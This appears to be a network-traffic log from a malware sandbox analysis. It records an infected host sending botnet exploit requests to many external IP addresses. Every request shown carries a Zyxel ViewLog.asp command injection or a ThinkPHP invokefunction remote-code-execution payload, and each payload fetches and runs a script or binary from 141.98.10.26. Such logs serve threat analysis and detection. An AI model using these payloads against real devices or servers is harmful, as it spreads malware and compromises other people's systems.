Nov 22, 2023 08:40:19.422945023 CET	18093	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:20.574771881 CET	18227	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:23.038461924 CET	18540	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:27.645792007 CET	19078	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:36.860528946 CET	19759	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:56.058047056 CET	19776	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
911	192.168.2.23	53406	94.120.99.85	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:18.869684935 CET	18074	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
912	192.168.2.23	37282	95.86.117.87	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:18.874489069 CET	18075	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
913	192.168.2.23	51238	31.210.215.174	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:18.884566069 CET	18076	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
914	192.168.2.23	39104	94.79.93.137	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:20.692012072 CET	18289	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:23.806384087 CET	18589	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:29.949455023 CET	19366	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:41.979789019 CET	19765	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
915	192.168.2.23	56948	95.154.217.147	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:20.892908096 CET	18291	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:21.098156929 CET	18306	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 22 Nov 2023 07:40:20 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Content-Encoding: gzip Data Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7b(HML),I310Q/Qp/K&T$dCAfAyyyzzIy%jaC]7X0

Session ID	Source IP	Source Port	Destination IP	Destination Port
916	192.168.2.23	46034	62.72.63.135	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:20.910233021 CET	18293	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:21.134320974 CET	18308	IN	HTTP/1.1 404 Vary: Origin Vary: Access-Control-Request-Method Vary: Access-Control-Request-Headers Content-Disposition: inline;filename=f.txt Content-Type: application/json Transfer-Encoding: chunked Date: Wed, 22 Nov 2023 07:40:21 GMT Keep-Alive: timeout=60 Connection: keep-alive Data Raw: 36 63 0d 0a 7b 22 74 69 6d 65 73 74 61 6d 70 22 3a 22 32 30 32 33 2d 31 31 2d 32 32 54 30 37 3a 34 30 3a 32 31 2e 30 31 38 2b 30 30 3a 30 30 22 2c 22 73 74 61 74 75 73 22 3a 34 30 34 2c 22 65 72 72 6f 72 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 2c 22 70 61 74 68 22 3a 22 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 22 7d 0d 0a Data Ascii: 6c{"timestamp":"2023-11-22T07:40:21.018+00:00","status":404,"error":"Not Found","path":"/cgi-bin/ViewLog.asp"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
917	192.168.2.23	43048	94.120.61.119	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:20.917366028 CET	18293	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
918	192.168.2.23	46694	31.200.31.38	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:20.920454025 CET	18294	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
919	192.168.2.23	53182	62.29.37.75	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:20.921168089 CET	18295	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
920	192.168.2.23	49386	94.121.72.222	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:21.134006977 CET	18307	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
921	192.168.2.23	34136	85.122.205.167	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:21.302767992 CET	18403	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
922	192.168.2.23	50828	112.125.198.43	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:21.332828045 CET	18414	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:21.650398970 CET	18425	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:34:04 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
923	192.168.2.23	40020	95.101.169.114	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:21.522377014 CET	18420	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
924	192.168.2.23	58852	95.97.116.146	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:21.534184933 CET	18421	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:21.733138084 CET	18427	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:40:21 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
925	192.168.2.23	35136	88.214.194.206	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:21.623603106 CET	18424	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:21.725794077 CET	18427	IN	HTTP/1.1 505 HTTP Version Not Supported Server: akka-http/10.1.11 Date: Wed, 22 Nov 2023 07:40:21 GMT Connection: close Content-Type: text/plain; charset=UTF-8 Content-Length: 74 Data Raw: 54 68 65 20 73 65 72 76 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 74 68 65 20 48 54 54 50 20 70 72 6f 74 6f 63 6f 6c 20 76 65 72 73 69 6f 6e 20 75 73 65 64 20 69 6e 20 74 68 65 20 72 65 71 75 65 73 74 2e Data Ascii: The server does not support the HTTP protocol version used in the request.

Session ID	Source IP	Source Port	Destination IP	Destination Port
926	192.168.2.23	60400	88.198.66.59	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:21.711241961 CET	18426	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:21.900012016 CET	18430	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 22 Nov 2023 07:40:21 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
927	192.168.2.23	48434	88.221.37.98	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:21.840850115 CET	18430	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:22.058051109 CET	18433	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Wed, 22 Nov 2023 07:40:21 GMT Date: Wed, 22 Nov 2023 07:40:21 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 65 33 34 31 30 36 30 26 23 34 36 3b 31 37 30 30 36 33 38 38 32 31 26 23 34 36 3b 66 66 65 66 31 36 39 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.ae341060.1700638821.ffef169</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
928	192.168.2.23	41854	94.121.184.42	8080

Timestamp	kBytes transferred	Direction	Data
